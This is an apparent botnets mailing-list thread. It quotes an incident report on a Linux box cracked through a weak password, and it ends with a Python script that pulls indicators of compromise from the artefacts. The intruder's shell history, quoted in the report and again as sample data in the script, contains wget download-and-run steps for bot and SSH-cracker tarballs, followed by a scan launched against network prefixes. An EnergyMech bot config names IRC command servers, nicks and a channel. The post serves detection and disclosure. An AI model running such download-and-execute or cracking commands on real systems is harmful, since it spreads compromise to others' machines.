To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
How did they get in?
Regards,
Adriel T. Desautels
Chief Technology Officer
Netragard, LLC.
Office : 617-934-0269
Mobile : 617-633-3821
http://www.linkedin.com/pub/1/118/a45
---------------------------------------------------------------
Netragard, LLC - http://www.netragard.com - "We make IT Safe"
Penetration Testing, Vulnerability Assessments, Website Security
bodik wrote:
> Hi,
>
> We've found one instance of a bot from someone called Drow (tools were
> compiled but not stripped somewhere in /home/drow ... ;))). Probably a
> Spanish-speaking person.
>
> Undernet admins should take a look down below and check their servers,
> if they are listening here ..
>
> Access was gained by a very, very weak password, and then the standard
> procedure follows: download bot, SSH cracker, spam tool ...
>
> It was a kiddie, coming from 89.123.217.233, with no cleanup and probably
> a manual job ..
>
> ---- cut history ----
>
> passwd
> ps x
> cd /tmp
> w
> ps x
> cd /tmp
> wget freewebs.com/staycu/stayku.tar
> tar xzvf stayku.tar
> cd .staycu
> ./linux
> cat /proc/cpuinfo
> cd /var/tmp/delles
> cd /var/tmp
> wget http://www.geocities.com/demonfire_16/delles.tar.gz
> tar xzvf delles.tar.gz
> cd delles
> ./a 200.62
> nohup ./start 59 >> /dev/null &
> cd /var/tmp/delles
> cat vuln.txt
> ps x
> cd /var/tmp/delles
> cat vuln.txt
> ps x
> cd /var/tmp/delles
> cat vuln.txt
> ...
> ...
>
> ---- cut history ----
>
> bodik
>
> ---- cut ----
>
> # Boqdan`S EnergyMech configuration file
> # v2.9.3 - Boqdan
>
> ##### Linking #####
> #ENTITY emech
> #LINKPASS abc123
> #LINKPORT 49152
> #LINK hismech a1b2c3 mech.host.net 49152
> #LINK hermech abcdefg 0 0
> AUTOLINK
>
> ##### Server List ####
> SERVER diemen.nl.eu.undernet.org 6660
> SERVER diemen.nl.eu.undernet.org 6667
> SERVER diemen.nl.eu.undernet.org 6669
> SERVER lelystad.nl.eu.undernet.org 6666
> SERVER lelystad.nl.eu.undernet.org 6667
> SERVER lelystad.nl.eu.undernet.org 6668
> SERVER london2.uk.eu.undernet.org 6660
> SERVER london2.uk.eu.undernet.org 6669
> SERVER london2.uk.eu.undernet.org 7000
> SERVER graz.at.eu.undernet.org 6660
> SERVER graz.at.eu.undernet.org 6670
> SERVER graz.at.eu.undernet.org 7000
> SERVER helsinki.fi.eu.undernet.org 6666
> SERVER helsinki.fi.eu.undernet.org 6669
> SERVER helsinki.fi.eu.undernet.org 7000
> SERVER montreal.qc.ca.undernet.org 6665
> SERVER montreal.qc.ca.undernet.rog 6669
> SERVER montreal.qc.ca.undernet.org 7000
> SERVER oslo2.no.eu.undernet.org 6660
> SERVER oslo2.no.eu.undernet.org 6669
> SERVER oslo2.no.eu.undernet.org 7000
>
>
>
> # SERVER 1.2.3.4 6667 ThisIsMyPassword
> # SERVER 192.168.100.1 6669 moo:eu.undernet.org:6667
>
> ##### Bot 1 Configuration #####
> NICK Boqdan
> USERFILE 1
> CMDCHAR -
> LOGIN gat
> IRCNAME tundd
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 1 #####
>
> ##### Bot 2 Configuration #####
>
> NICK Guapo
> USERFILE 1
> CMDCHAR -
> LOGIN lmess
> IRCNAME mesaju
> MODES +ix-ws
> #VIRtual
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 2 #####
>
> ##### Bot 3 Configuration #####
>
> NICK Bogdy
> USERFILE 1
> CMDCHAR -
> LOGIN Lucru
> IRCNAME LeLa
> MODES +ix-ws
> #VIRTUAL
> #NOSEEN
>
> HASONOTICE 1 # Yes for Undernet.
> TOG CC 1 # We want the bot to require command character
> TOG CLOAK 1 # Ignore CTCP's from non-users? Yes.
> TOG SPY 1 # Tell who is executing what in the partyline.
> SET OPMODES 6 # How many modes in a line? 6 on undernet...
> SET BANMODES 6 # How many bans in a line? 6 on undernet...
> SET CTIMEOUT 60 # Server connection timeout
> SET CDELAY 30 # Delay between connection attempts
>
> CHANNEL #staycu.com # Channel name
> TOG PUB 1 # Allow public(in-channel) commands? Yes.
> TOG MASS 1 # Do mass-mode/kick/ban checks...
> TOG SHIT 1 # Activate the shitlist for this channel
> TOG PROT 1 # Activate protection of users
> TOG ENFM 0 # Dont enforce channel modes.
> SET MDL 5 # How many -o before killing the guy?
> SET MKL 5 # How many kicks?
> SET MBL 5 # And how many Bans?
> SET MPL 1 # What to do with massmoders?
> # 0 = nothing,
> # 1 = kick the bastard,
> # 2 = kickban 'em,
> # 3 = kickban & shitlist them.
> ##### END BOT 3 #####
> ---- cut ----
> _______________________________________________
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
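The two artefacts bodik pasted (the attacker's shell history and the EnergyMech config) are exactly what an incident responder turns into indicators: download URLs, binaries executed from world-writable staging directories, the numeric prefixes handed to the cracker, and the IRC servers, nicks and channel the bots rendezvous on. The script below is an added example written for this post, not code from the list or from either poster. It embeds constructed excerpts of the quoted history and config (the `HISTORY` and `EMECH_CONF` strings are shortened copies, not the full originals), assumes the emech keywords `SERVER`, `NICK` and `CHANNEL` mean what the quoted comments say they mean, and treats `/tmp`, `/var/tmp` and `/dev/shm` as the staging directories to watch; the `PREFIX_RE` heuristic for scan arguments is an assumption about this toolkit, not a documented fact.

```python
"""Pull indicators of compromise out of a captured shell history and an
EnergyMech bot config, modelled on the artefacts quoted in the post above.
The sample inputs are constructed excerpts, not the full originals."""
import posixpath
import re

# Constructed excerpt of the attacker's bash history from the post above.
HISTORY = """\
passwd
ps x
cd /tmp
wget freewebs.com/staycu/stayku.tar
tar xzvf stayku.tar
cd .staycu
./linux
cd /var/tmp
wget http://www.geocities.com/demonfire_16/delles.tar.gz
tar xzvf delles.tar.gz
cd delles
./a 200.62
nohup ./start 59 >> /dev/null &
cat vuln.txt
"""

# Constructed excerpt of the emech config from the post above.
EMECH_CONF = """\
# Boqdan`S EnergyMech configuration file
SERVER diemen.nl.eu.undernet.org 6667
SERVER montreal.qc.ca.undernet.rog 6669
# SERVER 1.2.3.4 6667 ThisIsMyPassword
NICK Boqdan
CHANNEL #staycu.com # Channel name
NICK Guapo
CHANNEL #staycu.com # Channel name
"""

# Assumed: world-writable directories attackers typically stage tools in.
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Assumed heuristic: a bare dotted-decimal prefix such as 200.62 or 59 is a
# network range handed to the cracker, not an ordinary argument.
PREFIX_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){0,3}$")


def _in_staging(cwd):
    return any(cwd == d or cwd.startswith(d + "/") for d in STAGING_DIRS)


def iocs_from_history(text, start_cwd="~"):
    """Walk the history, tracking cwd so './x' resolves to a full path.
    Returns download URLs, binaries run from staging dirs, and the
    prefix-looking arguments passed to those binaries."""
    cwd = start_cwd
    urls, staged_binaries, scan_prefixes = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # nohup, output redirection and '&' are noise for IOC purposes
        line = re.sub(r"^nohup\s+", "", line)
        line = re.sub(r"\s*(>>?\s*\S+)?\s*&?$", "", line)
        toks = line.split()
        cmd, args = toks[0], toks[1:]
        if cmd in ("wget", "curl", "fetch") and args:
            urls.append(args[-1])
        elif cmd == "cd" and args:
            cwd = posixpath.normpath(posixpath.join(cwd, args[0]))
        elif cmd.startswith("./") and _in_staging(cwd):
            staged_binaries.append(posixpath.normpath(posixpath.join(cwd, cmd)))
            scan_prefixes.extend(a for a in args if PREFIX_RE.match(a))
    return {"urls": urls, "staged_binaries": staged_binaries,
            "scan_prefixes": scan_prefixes}


def iocs_from_emech(text):
    """Extract IRC rendezvous data from an EnergyMech config. Comment lines
    start with '#', but a CHANNEL value also starts with '#', so values are
    taken positionally rather than by stripping everything after '#'."""
    servers, nicks, channels = [], [], []
    for raw in text.splitlines():
        toks = raw.split()
        if not toks or toks[0].startswith("#"):
            continue  # blank line or commented-out directive
        key, rest = toks[0].upper(), toks[1:]
        if key == "SERVER" and len(rest) >= 2 and rest[1].isdigit():
            servers.append((rest[0].lower(), int(rest[1])))
        elif key == "NICK" and rest:
            nicks.append(rest[0])
        elif key == "CHANNEL" and rest:
            channels.append(rest[0].lower())
    return {"servers": servers,
            "c2_hosts": sorted({h for h, _ in servers}),
            "nicks": nicks,
            "channels": sorted(set(channels))}


if __name__ == "__main__":
    for k, v in iocs_from_history(HISTORY).items():
        print(f"{k}: {v}")
    for k, v in iocs_from_emech(EMECH_CONF).items():
        print(f"{k}: {v}")
```

Run it as-is to see the indicators from the constructed excerpts, or swap in a real `~/.bash_history` and the bot's config file. The `c2_hosts` list is what goes into an egress block or an IRC-traffic detection; note that it deliberately keeps the misspelt `undernet.rog` host from the original config rather than "correcting" it, since a resolver failure on that entry is itself an observable.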
